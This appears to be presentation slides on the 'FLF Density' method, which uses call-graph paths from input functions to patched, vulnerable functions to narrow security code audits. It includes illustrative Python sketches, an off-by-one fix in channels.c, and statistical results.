Because of the detail within the AST, our tools can perform analysis that is typically hard to do, such as pointer aliasing and dataflow across function boundaries.

Finding Inputs
An Input is a function that reads in external user input, for example by calling read. A list of external function calls was compiled to properly identify Inputs. This list could be modified to contain application-specific library calls.
Input functions: these are functions like read, scanf, recv, and getopt, coming from unistd.h, stdio.h, getopt.h, stdlib.h, and sys/socket.h.
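The matching step can be illustrated with a minimal sketch. It is not the SGA implementation: the `find_inputs` helper, the `INPUT_CALLS` set, and the toy call facts are all hypothetical names made up for illustration, and the call facts are assumed to be available as a plain mapping from each function to the names it calls.

```python
# Hypothetical list of external input routines; the slide names read, scanf,
# recv, and getopt as examples. A real list would be longer and could be
# extended with application-specific library calls.
INPUT_CALLS = {"read", "scanf", "recv", "getopt"}


def find_inputs(calls, input_calls=INPUT_CALLS):
    """Return the functions that directly call an external input routine.

    `calls` maps each function name to the set of names it calls.
    """
    return {fn for fn, callees in calls.items() if callees & input_calls}


# Toy call facts, made up for illustration.
calls = {
    "main": {"parse_args", "serve"},
    "parse_args": {"getopt"},
    "serve": {"handle_packet"},
    "handle_packet": {"recv", "channel_lookup"},
    "channel_lookup": {"log"},
}

print(sorted(find_inputs(calls)))  # ['handle_packet', 'parse_args']
```

Passing a different `input_calls` set is how an application-specific list would be plugged in under this sketch.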

Finding Targets
A Target is any function that contains a known vulnerability. Targets are found by matching code facts on subtractive lines in a patch file with code facts in the repository generated by GAST-MP.

    --- channels.c 27 Feb :23:
    +++ channels.c 4 Mar :37:
    @@ -146,7 +146,7 @@
     {
         Channel *c;
    -    if (id < 0 || id > channels_alloc) {
    +    if (id < 0 || id >= channels_alloc) {
             log("channel_lookup: %d: bad id", id);
             return NULL;
         }

Subtractive lines: in this example, all the entities on the subtractive line would be noted as vulnerable. Therefore, the function which contains this subtractive line is a Target.
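As a rough illustration of the idea, the sketch below pulls the subtractive lines out of a unified diff and maps them to functions by line number. This is a simplification and an assumption: GAST-MP matches code facts, not line ranges, and the `removed_lines` and `find_targets` helpers, the `function_ranges` table, and its line numbers are hypothetical. The sketch also assumes the patch touches a single file.

```python
import re

# Matches a unified-diff hunk header such as "@@ -146,7 +146,7 @@".
HUNK_RE = re.compile(r"^@@ -(\d+)(?:,\d+)? \+(\d+)(?:,\d+)? @@")


def removed_lines(patch_text):
    """Return (old_line_number, text) for each subtractive line in the patch."""
    removed = []
    old_line = None  # stays None until the first hunk header is seen
    for line in patch_text.splitlines():
        match = HUNK_RE.match(line)
        if match:
            old_line = int(match.group(1))
        elif old_line is None or line.startswith("\\"):
            continue  # file headers, or a "\ No newline at end of file" marker
        elif line.startswith("-"):
            removed.append((old_line, line[1:].strip()))
            old_line += 1
        elif line.startswith("+"):
            continue  # added lines exist only in the new file
        else:
            old_line += 1  # context line, present in both versions
    return removed


def find_targets(patch_text, function_ranges):
    """Return functions whose pre-patch line range contains a removed line.

    `function_ranges` maps name -> (first_line, last_line) in the old file.
    """
    targets = set()
    for line_no, _ in removed_lines(patch_text):
        for name, (first, last) in function_ranges.items():
            if first <= line_no <= last:
                targets.add(name)
    return targets


PATCH = """\
--- channels.c
+++ channels.c
@@ -146,7 +146,7 @@
 {
     Channel *c;
-    if (id < 0 || id > channels_alloc) {
+    if (id < 0 || id >= channels_alloc) {
         log("channel_lookup: %d: bad id", id);
         return NULL;
     }
"""

# Hypothetical line ranges for two functions in the pre-patch channels.c.
ranges = {"channel_lookup": (144, 155), "channel_free": (160, 180)}
print(find_targets(PATCH, ranges))  # {'channel_lookup'}
```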

Validating the FLF Hypothesis
Experiments: steps 2-5 (static analysis with GAST-MP & SGA, identifying Inputs, identifying Targets, and calculating the FLF Density) constitute an experiment that was prepared, automated, and run to validate our hypothesis. This will all be explained.

FLF Density
1. Create the entire call graph G.
2. Transform G into a DAG.
3. Label the Input and Target nodes.
4. Calculate the invocation paths between Input and Target combinations and measure their length.
5. Calculate the FLF Density by normalizing path length by function cardinality.
6. For each system, choose the largest FLF Density.
The FLF Density represents those functions that handled data which was used in a security vulnerability.
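The steps above can be sketched as follows. This is a minimal illustration under stated assumptions, not the SGA algorithm: the call graph is assumed to be acyclic already (the DAG transformation is skipped), edges run from caller to callee, path length is counted in functions on the path, and function cardinality is taken to be the number of functions in the graph. The `flf_density` helper and the toy graph are hypothetical.

```python
from functools import lru_cache


def flf_density(calls, inputs, targets):
    """Largest Input-to-Target path length divided by the number of functions.

    `calls` maps caller -> set of callees and must be acyclic (assumption).
    """
    functions = set(calls) | {c for callees in calls.values() for c in callees}
    if not functions:
        return 0.0

    @lru_cache(maxsize=None)
    def longest_to_target(fn):
        # Number of functions on the longest path from fn to any Target,
        # or 0 when no Target is reachable from fn.
        best = 1 if fn in targets else 0
        for callee in calls.get(fn, ()):
            sub = longest_to_target(callee)
            if sub:
                best = max(best, sub + 1)
        return best

    # Taking the longest path over all Input/Target pairs yields the largest
    # density, since every pair shares the same normalizing factor.
    longest = max((longest_to_target(i) for i in inputs), default=0)
    return longest / len(functions)


# Toy acyclic call graph, made up for illustration.
calls = {
    "main": {"serve"},
    "serve": {"handle_packet"},
    "handle_packet": {"parse_header", "channel_lookup"},
    "parse_header": {"channel_lookup"},
    "channel_lookup": set(),
    "usage": set(),
}

density = flf_density(calls, inputs={"handle_packet"}, targets={"channel_lookup"})
print(density)  # 0.5  (3 functions on the longest path / 6 functions)
```

A toy graph this small gives a large density; on real systems with many functions the same ratio is far smaller.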

Experimental Results
The longest path is the longest achievable invocation path between an Input and a Target.
Normalizing factor: we chose function cardinality as the normalizing factor because it seems to be an accurate representation of functional complexity. Longer path lengths indicate greater functional complexity, so scaling by function cardinality gives a good metric.
Why not path length: other suggestions for a normalizing factor were the longest path and the average path. The longest path in a system is implicitly an outlier and therefore not a good normalizing factor. The average path length is time-consuming to compute.

Experimental Results
Sample mean FLF Density: 2.87%. Therefore, a very small number of functions are actually likely to be vulnerable.
Standard deviation: 1.87%. The FLF Density was consistent across our experimental systems.
With 95% confidence, the true mean is between 2.23% and 3.51%. There is a high probability that our experimental density is close to the true FLF Density.
Confidence: the 95% confidence level is important because the interval is very small.
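For readers who want to see how such an interval is formed, here is a minimal sketch of a normal-approximation confidence interval for a mean. The sample size and critical value behind the reported interval are not stated on the slide, so `n=30` (the number of experimental systems) and `z=1.96` are assumptions, and the `mean_confidence_interval` helper is hypothetical. Under those assumptions the result is close to, but not identical with, the reported 2.23% to 3.51%.

```python
import math


def mean_confidence_interval(mean, std_dev, n, z=1.96):
    """Normal-approximation confidence interval for a sample mean."""
    half_width = z * std_dev / math.sqrt(n)
    return mean - half_width, mean + half_width


# Assumed inputs: mean and standard deviation from the slide, n taken from
# the count of experimental systems, z for a two-sided 95% level.
low, high = mean_confidence_interval(2.87, 1.87, n=30)
print(f"{low:.2f}% to {high:.2f}%")  # 2.20% to 3.54%
```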

Verification
The FLF Density can be used as a conservative way to highlight those likely vulnerable functions which do not have known vulnerabilities.
FLF Density check: these three systems all had security vulnerabilities but were reserved to test the FLF Density. Dhcpd was missed due to function pointers.

FLF Finder
The FLF Density can say which areas of code are statistically likely to be vulnerable. FLF Finder is an automated tool to find these areas. Targets are not provided, so what do we do? Assume all functions are Targets. Even with this extremely conservative assumption, the amount of code to review is still reduced by 60%!

Conclusion
There is credibility to the FLF hypothesis. FLF Finder can pinpoint those areas of code which are statistically likely to be vulnerable, giving a 60% code reduction. This will greatly improve the efficiency of security code auditors! Efficiency improvements make auditing more appealing to software developers.
